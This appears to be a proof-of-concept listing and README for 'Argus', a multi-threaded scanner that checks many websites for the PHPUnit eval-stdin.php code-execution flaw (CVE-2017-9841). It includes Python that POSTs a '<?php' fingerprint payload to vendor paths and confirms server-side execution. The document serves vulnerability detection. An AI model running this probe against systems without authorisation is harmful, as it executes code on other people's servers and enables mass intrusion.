
CVE-2017-9841 PoC — PHPUnit Security Vulnerability

Associated Vulnerability
Title: PHPUnit security vulnerability (CVE-2017-9841)
Description: Util/PHP/eval-stdin.php in PHPUnit before 4.8.28 and 5.x before 5.6.3 allows remote attackers to execute arbitrary PHP code via HTTP POST data beginning with a "<?php " substring, as demonstrated by an attack on a site with an exposed /vendor folder, i.e., external access to the /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php URI.
Description
"Argus" is a scanner that checks a list of websites for CVE-2017-9841 in PHPUnit. It confirms the vulnerability by submitting a harmless fingerprint payload to the exposed eval-stdin.php and checking that the server actually executed it, rather than relying on the file's presence alone.
Readme
# Argus PHPUnit Scanner

<img width="358" height="358" alt="image" src="https://github.com/user-attachments/assets/e10d6173-c6cf-42ed-8ae6-c89d88493da9" />

A security tool that detects exposed, vulnerable copies of PHPUnit's `eval-stdin.php` (CVE-2017-9841) in web applications. Named after Argus Panoptes, the all-seeing giant with a hundred eyes from Greek mythology, this tool watches over web applications to identify PHPUnit installations that could lead to remote code execution.

## 🔍 Features

- **Multi-threaded scanning** for efficient testing of multiple targets
- **Intelligent payload generation** with unique identifiers for accurate validation
- **Multiple vulnerability path checking** across common web application structures
- **Automatic response validation** to confirm actual vulnerabilities
- **Detailed logging** of vulnerable sites and errors
- **Colorful terminal output** with real-time progress tracking
- **Configurable timeout and retry mechanisms** for reliable scanning

## 📋 Requirements

- Python 3.6+
- Required Python packages (see installation section)
- List of target domains/IPs to scan

## 🚀 Installation

1. Clone the repository:
   ```
   git clone https://github.com/joelindra/Argus.git
   cd Argus
   ```

2. Install the required dependencies:
   ```
   pip install -r requirements.txt
   ```

   Or install dependencies manually:
   ```
   pip install requests colorama tqdm pyfiglet termcolor urllib3
   ```

## 💻 Usage

1. Create a text file containing a list of target websites (one per line)
2. Run the script:
   ```
   python3 argus.py
   ```
3. When prompted, enter:
   - The path to your target list file
   - The number of concurrent threads to use (default: 10)

4. The scanner will begin checking each site for the PHPUnit vulnerability

## 📊 Output

The script creates a `results` directory containing:
- `vulnerable_[timestamp].txt` - Detailed information about vulnerable sites
- `errors_[timestamp].txt` - Error logs for debugging

## 🔍 How It Works

Just as Argus Panoptes kept watch with his hundred eyes, this tool works by:
1. Requesting the paths where the vulnerable `eval-stdin.php` file is commonly found (for example `/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`)
2. POSTing a short PHP snippet whose body begins with `<?php`, since the file evaluates the raw request body, that computes a unique per-request fingerprint
3. Checking the response for that fingerprint, so only genuine code execution (not a reflected request or a generic 200 page) counts as a hit
4. Recording confirmed vulnerabilities for further investigation
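
The probe-and-verify logic described above, written out as an added Python example (this is not the Argus source; it is an illustration of the technique). It builds the fingerprint probe, posts it to a few candidate paths (the first is the URI named in the CVE description; the others are assumed layouts), and reports a host only when the response contains the MD5 that the server must have computed, so a page that merely echoes the request body back is not flagged. The `post` callable is injectable: `http_post` is a standard-library poster for authorised targets, while the two constructed stand-in servers at the bottom let the logic run offline.

```python
"""Probe-and-verify logic for CVE-2017-9841 (added example, not the Argus source)."""
import hashlib
import secrets
import urllib.error
import urllib.parse
import urllib.request
from typing import Callable, Iterable, Optional, Tuple

# Locations to try. The first is the URI named in the CVE description; the
# others are assumptions about applications installed in a sub-directory.
CANDIDATE_PATHS = (
    "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php",
    "/laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php",
    "/lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php",
)

# A poster takes (url, body) and returns (status, response text).
PostFn = Callable[[str, bytes], Tuple[int, str]]


def build_probe(token: str) -> Tuple[bytes, str]:
    """Return the POST body and the marker a vulnerable host must produce.

    eval-stdin.php evaluates the raw request body as PHP, so the body has to
    begin with '<?php '. Echoing md5(token) rather than the token itself
    means a reflected request body can never be mistaken for execution.
    """
    body = f'<?php echo md5("{token}");'.encode()
    expected = hashlib.md5(token.encode()).hexdigest()
    return body, expected


def confirms_execution(response_text: str, expected: str) -> bool:
    """True only if the server-computed marker appears in the response."""
    return expected in response_text


def scan_host(base_url: str, post: PostFn,
              paths: Iterable[str] = CANDIDATE_PATHS) -> Optional[str]:
    """Return the first URL that executed the probe, or None.

    Network errors and non-matching responses are skipped, not reported:
    a timeout or a 404 is not evidence either way.
    """
    base = base_url.rstrip("/")
    for path in paths:
        token = secrets.token_hex(8)          # fresh marker for every request
        body, expected = build_probe(token)
        try:
            _status, text = post(base + path, body)
        except (OSError, ValueError):
            continue
        if confirms_execution(text, expected):
            return base + path
    return None


def http_post(url: str, body: bytes, timeout: float = 10.0) -> Tuple[int, str]:
    """Standard-library poster for use against authorised targets only."""
    req = urllib.request.Request(url, data=body, method="POST",
                                 headers={"Content-Type": "text/plain"})
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.status, resp.read(4096).decode("utf-8", "replace")
    except urllib.error.HTTPError as err:
        return err.code, err.read(4096).decode("utf-8", "replace")


# --- constructed stand-ins so the logic can be exercised offline ------------

def fake_vulnerable_server(url: str, body: bytes) -> Tuple[int, str]:
    """Mimics a host with an exposed vendor/ tree: it 'executes' the probe by
    computing md5 of the quoted token, exactly as the PHP would."""
    path = urllib.parse.urlsplit(url).path
    if path == CANDIDATE_PATHS[0] and body.startswith(b"<?php "):
        token = body.decode().split('"')[1]
        return 200, hashlib.md5(token.encode()).hexdigest()
    return 404, "Not Found"


def fake_reflecting_server(url: str, body: bytes) -> Tuple[int, str]:
    """Mimics a debug page that echoes the request body; must not be flagged."""
    return 200, body.decode()


if __name__ == "__main__":
    print("vulnerable:", scan_host("http://example.test", fake_vulnerable_server))
    print("reflecting:", scan_host("http://example.test", fake_reflecting_server))
```

Against a real target you would pass `http_post` (or a `requests`-based equivalent with the timeout and retry settings the README mentions) in place of the stand-ins. A useful caveat when reading results: a host that returns the hash has executed attacker-supplied PHP, which is a confirmed finding; a host that returns 200 with the probe echoed back, a WAF block page, or a 404 tells you nothing about whether another copy of the file exists elsewhere on the site.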

## ⚠️ Disclaimer

This tool is intended for legitimate security testing with proper authorization. Using this tool against systems without explicit permission may be illegal. The author is not responsible for any misuse of this software.

## 👨‍💻 Author

**Joel Indra**
- GitHub: [github.com/joelindra](https://github.com/joelindra)

## 📜 License

This project is licensed under the MIT License - see the LICENSE file for details.